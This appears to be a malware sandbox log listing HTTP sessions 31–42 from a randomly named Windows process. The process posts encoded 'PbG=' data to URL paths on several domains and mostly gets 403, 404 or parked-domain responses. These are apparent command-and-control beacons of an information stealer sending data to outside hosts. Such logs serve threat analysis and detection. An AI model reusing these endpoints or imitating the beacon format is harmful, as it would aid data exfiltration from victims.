                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


Session ID: 31 | Source IP: 192.168.11.20 | Source Port: 49763 | Destination IP: 162.255.119.150 | Destination Port: 80 | PID: 1136 | Process: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:00:06.378160000 CEST | 1289 | OUT | POST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:00:06.378210068 CEST | 5638 | OUT
                                                                                                                                                    Data Ascii: hrS3Yiyo3sdUfMIEN2o9cjjJoFSwf+iUM49fvE76TTxM1Dki15I6OBL/YsgF6LFHmFiS4KLLNhkUwRlN0U8WEl3bCXt8drkyXhvk+I44gF8dkaSAoAKRq/wJmlzC8qIu/dk6UCirMDTuzo74VfRL1pVwsKSrpvebna3L4ZGT96asWYi44J731b7q80O9gdUZfmMRiqIMTpdzvXbfO4nPYPFI41NsimEjz+ZulLh6oP2E2YOmxbN
Oct 4, 2024 12:00:06.492801905 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:06 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


Session ID: 32 | Source IP: 192.168.11.20 | Source Port: 49764 | Destination IP: 162.255.119.150 | Destination Port: 80 | PID: 1136 | Process: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:00:09.018197060 CEST | 432 | OUT | GET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:00:09.132087946 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:09 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


Session ID: 33 | Source IP: 192.168.11.20 | Source Port: 49765 | Destination IP: 91.195.240.19 | Destination Port: 80 | PID: 1136 | Process: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:00:22.645256042 CEST | 687 | OUT | POST /qrln/ HTTP/1.1
                                                                                                                                                    Host: www.ytfunnels.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.ytfunnels.com
                                                                                                                                                    Referer: http://www.ytfunnels.com/qrln/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=t9fNn+azf17h07lyHsV96E0T+GaGrhscsj6SWd5qSj7FmA+cc6NBHxugysrEAPPfxlNTBJzCJM1CnGGMdQza9sF6sCRONZXD9y/+NHXkTNjx0TSx4eJTQJEbzCGIezOVPMuPIrUNS99lgziCGhFxspqyPaCcr0r5ndNStGnGw5EvtnTpDKahcnaqe1JCHjzGWg==
Oct 4, 2024 12:00:22.827095032 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID: 34 | Source IP: 192.168.11.20 | Source Port: 49766 | Destination IP: 91.195.240.19 | Destination Port: 80 | PID: 1136 | Process: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:00:25.347562075 CEST | 707 | OUT | POST /qrln/ HTTP/1.1
                                                                                                                                                    Host: www.ytfunnels.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.ytfunnels.com
                                                                                                                                                    Referer: http://www.ytfunnels.com/qrln/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=t9fNn+azf17h1YNyIv99vU0SwmaG+RsYsj2SWc96RRvFnhOcf/5BKRug4MrBd/PUxlR9BJ/CJMhCnG2MdnHV88F41SRMD5XD9y/+NHDeTLLx0jCx47lQZpEa0CGIJjOZPMvqIqInS+VlgySCH0pyjpq0C6CMg0ilheNCqU/rp8UxsxCze4uFf0GYaFwqFhydLhexkGQCOBHpLPiiamFtA54=
Oct 4, 2024 12:00:25.529917955 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    date: Fri, 04 Oct 2024 10:00:25 GMT
                                                                                                                                                    content-type: text/html
                                                                                                                                                    content-length: 154
                                                                                                                                                    server: Parking/1.0
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID: 35 | Source IP: 192.168.11.20 | Source Port: 49767 | Destination IP: 91.195.240.19 | Destination Port: 80 | PID: 1136 | Process: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:00:28.050700903 CEST | 2578 | OUT | POST /qrln/ HTTP/1.1
                                                                                                                                                    Host: www.ytfunnels.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.ytfunnels.com
                                                                                                                                                    Referer: http://www.ytfunnels.com/qrln/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=[TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:28.050750017 CEST  4334  OUT
                                                                                                                                                    Data Ascii: U+it9ej9rSO9WFY5tgAIKBTylz/b+wKvmaBBp+w2250lbCkRWdgR+LubQMkTTWcDjCTenNv7OZSn0nm7sKmLjWdqgAaEfCdThzZh7PEYkBuj1Jq9lLyEUZ0XB/nQKqUBNuK4ZUBDLaqk2Z5611Ly7UKGdA2UdYzx5cbVHmwOb9K865NWLclwbf/ITTziOTWh4V07rZZrWMXNEBNoHNxLV8tymk/gFVTEjulpGh4qcYiRC5Mmpz9
                                                                                                                                                    Oct 4, 2024 12:00:28.232295990 CEST  208  IN  HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                    36  192.168.11.20  49768  91.195.240.19  80  1136  C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                    Oct 4, 2024 12:00:30.753542900 CEST  427  OUT  GET /qrln/?PbG=g/3tkO+pfBzB25V2Fctu5FsR83L3yxpv2AjDY8JJQQvDhQWyNNgQJTDimODyfvCkj1kKdo2+K9Uv71CRdCP6v9xe1ERDIsip1ir5cWHLWL+Z9Uyq0+QdRb0=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.ytfunnels.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:00:30.935415030 CEST  208  IN  HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                    37  192.168.11.20  49769  46.102.130.116  80  1136  C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                    Oct 4, 2024 12:00:37.813080072 CEST  696  OUT  POST /qlei/ HTTP/1.1
                                                                                                                                                    Host: www.hedieplastic.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.hedieplastic.com
                                                                                                                                                    Referer: http://www.hedieplastic.com/qlei/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=4fJB8edU120JRFaNImJMZlVZfOxqrDHnJD4AtU0QwS0q/006KfTBtK2NnV6rpfxNWkHixz9qbZ7e/CXtUTJLHRkIJf9ULu9cRHRKiPhwsVUvNyooZVmcH236MpGneueJcbRvHsClEg70I+y15ezhn102nthLW9D6UXBFNEzIPCAc2RPbYXJEjt/Qv2BEJgz+YQ==
                                                                                                                                                    Oct 4, 2024 12:00:38.135201931 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                    Cache-Control: private,public
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Set-Cookie: ASP.NET_SessionId=jrsx5mkgfgpcnqwjecgalre1; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:38 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1476
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head id="Head1"><title> </title><meta name="description" content="404 - Not Found" /><meta name="keywords" content=",,,,,,404 - Not Found" /></head><body> <link href="/Users/Pages/71.css" rel="stylesheet" type="text/css"/><div><div dir="ltr" class="_71_0">&nbsp;</div><h1 dir="ltr" class="_71_0"><span class="_71_2"><span class="_71_3"><strong>Oops!!! 404 - Not Found</strong></span></span></h1><div>&nbsp;</div><div class="_71_0"><span class="_71_5"><span class="_71_6">&nbsp; . <br /><br /> . <br /><br /> &nbsp; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:38.135217905 CEST  450  IN
                                                                                                                                                    Data Ascii: &nbsp; &nbsp;<br /><br /> <br /><br />


                                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                    38  192.168.11.20  49770  46.102.130.116  80  1136  C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                    Oct 4, 2024 12:00:40.634516001 CEST  716  OUT  POST /qlei/ HTTP/1.1
                                                                                                                                                    Host: www.hedieplastic.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.hedieplastic.com
                                                                                                                                                    Referer: http://www.hedieplastic.com/qlei/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=4fJB8edU120JQlKNKFxMRlVaRuxqijH7JDEAtWZLwggq8UE6LanBqK2N/F7gn/xEWkLAxyBqbZfe/GftXgxEIhkKcP9WGO9cRHRKiMdJsVMvODYoYwafNW35LpGnVOeFcbQKHtePEl/0I8616Pziu11/pNg1HMu3XV1TAmbHIigf6neBFl9gg+jirG4sLiylFUcHVT9m8QTJeKNWsFfhjKM=
                                                                                                                                                    Oct 4, 2024 12:00:40.964016914 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                    Cache-Control: private,public
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Set-Cookie: ASP.NET_SessionId=c2amcwrn3nza0amzggyfnv3v; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:40 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1476
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head id="Head1"><title> </title><meta name="description" content="404 - Not Found" /><meta name="keywords" content=",,,,,,404 - Not Found" /></head><body> <link href="/Users/Pages/71.css" rel="stylesheet" type="text/css"/><div><div dir="ltr" class="_71_0">&nbsp;</div><h1 dir="ltr" class="_71_0"><span class="_71_2"><span class="_71_3"><strong>Oops!!! 404 - Not Found</strong></span></span></h1><div>&nbsp;</div><div class="_71_0"><span class="_71_5"><span class="_71_6">&nbsp; . <br /><br /> . <br /><br /> &nbsp; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:40.964035034 CEST  450  IN
                                                                                                                                                    Data Ascii: &nbsp; &nbsp;<br /><br /> <br /><br />


                                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                    39  192.168.11.20  49771  46.102.130.116  80  1136  C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                    Oct 4, 2024 12:00:43.474071026 CEST  2578  OUT  POST /qlei/ HTTP/1.1
                                                                                                                                                    Host: www.hedieplastic.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.hedieplastic.com
                                                                                                                                                    Referer: http://www.hedieplastic.com/qlei/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=[TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:43.474106073 CEST  4343  OUT
                                                                                                                                                    Data Ascii: cU2+ge5++SggSD5X/3coIyjutbxJiubVju54LmkRSNXzOCHsJWzHwf1Rswv4c3xQKKCn0XCy91qaGmjectxOmLNiyTGTw4JJKB+keQZfp76Fj7jSzAnxUEfplj0xsRxJvAA7NaNsSEyeBxb1mZl/AJjT/Zk96XiaQd0+2yBHe9DuD2CF2VsDO9NPcVGnXO0g3H9b1ZHNwkcBpRoJAfpndqXGqANERQpgC0c+rlMjoztj6ZNqpdb
                                                                                                                                                    Oct 4, 2024 12:00:43.805389881 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                    Cache-Control: private,public
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Set-Cookie: ASP.NET_SessionId=df3g3dyd3cnzyo4re1j1ozuc; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:43 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1476
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head id="Head1"><title> </title><meta name="description" content="404 - Not Found" /><meta name="keywords" content=",,,,,,404 - Not Found" /></head><body> <link href="/Users/Pages/71.css" rel="stylesheet" type="text/css"/><div><div dir="ltr" class="_71_0">&nbsp;</div><h1 dir="ltr" class="_71_0"><span class="_71_2"><span class="_71_3"><strong>Oops!!! 404 - Not Found</strong></span></span></h1><div>&nbsp;</div><div class="_71_0"><span class="_71_5"><span class="_71_6">&nbsp; . <br /><br /> . <br /><br /> &nbsp; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:43.805404902 CEST450INData Raw: d8 aa d8 b1 d8 b3 db 8c 20 d8 a8 d9 87 20 d8 a7 db 8c d9 86 20 d8 b5 d9 81 d8 ad d9 87 20 d9 86 db 8c d8 a7 d8 b2 20 d8 a8 d9 87 26 6e 62 73 70 3b d8 af d8 b3 d8 aa d8 b1 d8 b3 db 8c 20 d9 88 db 8c da 98 d9 87 26 6e 62 73 70 3b d8 a8 d8 a7 d8 b4
                                                                                                                                                    Data Ascii: &nbsp; &nbsp;<br /><br /> <br /><br />


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.20 | 49772 | 46.102.130.116 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:00:46.317574978 CEST | 430 | OUT | GET /qlei/?PbG=1dhh/rR2+Ao8cSiudW9CEG89SOA5iCCmNAl/rU9Fzwpz0XQlGI+SqOP59XCH8flBSUq99zsbRoSQkEbtVQJkQy88E/1gHIIJW2hLrfVypywFJgwBZQbuFEw=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.hedieplastic.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:00:46.653053045 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Cache-Control: private,public
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=yjxzm0xtgg2mwcbx4vmy3tlz; path=/; HttpOnly; SameSite=Lax
Date: Fri, 04 Oct 2024 10:00:46 GMT
Connection: close
Content-Length: 1476
Data Ascii: <!DOCTYPE html><html><head id="Head1"><title> </title><meta name="description" content="404 - Not Found" /><meta name="keywords" content=",,,,,,404 - Not Found" /></head><body> <link href="/Users/Pages/71.css" rel="stylesheet" type="text/css"/><div><div dir="ltr" class="_71_0">&nbsp;</div><h1 dir="ltr" class="_71_0"><span class="_71_2"><span class="_71_3"><strong>Oops!!! 404 - Not Found</strong></span></span></h1><div>&nbsp;</div><div class="_71_0"><span class="_71_5"><span class="_71_6">&nbsp; . <br /><br /> . <br /><br /> &nbsp; [TRUNCATED]
Oct 4, 2024 12:00:46.653069019 CEST | 450 | IN | Data Ascii: &nbsp; &nbsp;<br /><br /> <br /><br />


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.20 | 49773 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:08.367368937 CEST | 690 | OUT | POST /w8xy/ HTTP/1.1
Host: www.gipsytroya.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.gipsytroya.com
Referer: http://www.gipsytroya.com/w8xy/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Data Ascii: PbG=wskZYJ0YSTpRcoHmGuVCtr802uVl+qeJ2rwtsgnVh8HaqTQsk5h4vQjdoy6BAWcj84u57Bk9zT4yqZupYrVrFocFALywrzClxrK+EPod4Fc3vQxwXdbbb9sBAfnoOO7KQ1Bw4Gtxg0/vzntAdG/fLhhu18HXoRNn+29c88lmbk7QbAMvhOk6atTDMSq20a1RUw==
Oct 4, 2024 12:01:08.549079895 CEST | 208 | IN | HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.20 | 49774 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:11.071880102 CEST | 710 | OUT | POST /w8xy/ HTTP/1.1
Host: www.gipsytroya.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.gipsytroya.com
Referer: http://www.gipsytroya.com/w8xy/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Data Ascii: PbG=wskZYJ0YSTpRcM7mEN9C6b81zuVlxKeF2r8tslWQhOTaqzgs2LJ4uQjd8C6Efmcs84jE7Fk9zT8yqdipYcBsfYcHIryuvzClxrK+EL564Bw3vl5wW43YRdsCHfnoFu7OQ1BW4Hg5g3HvziRAdX/eChgnqsGkmBMz/ThL3dFvTVnKX2d188QeZ+PxIiTe2Y0KJ37d6EkF0uy+H7mV7Aycgcc=
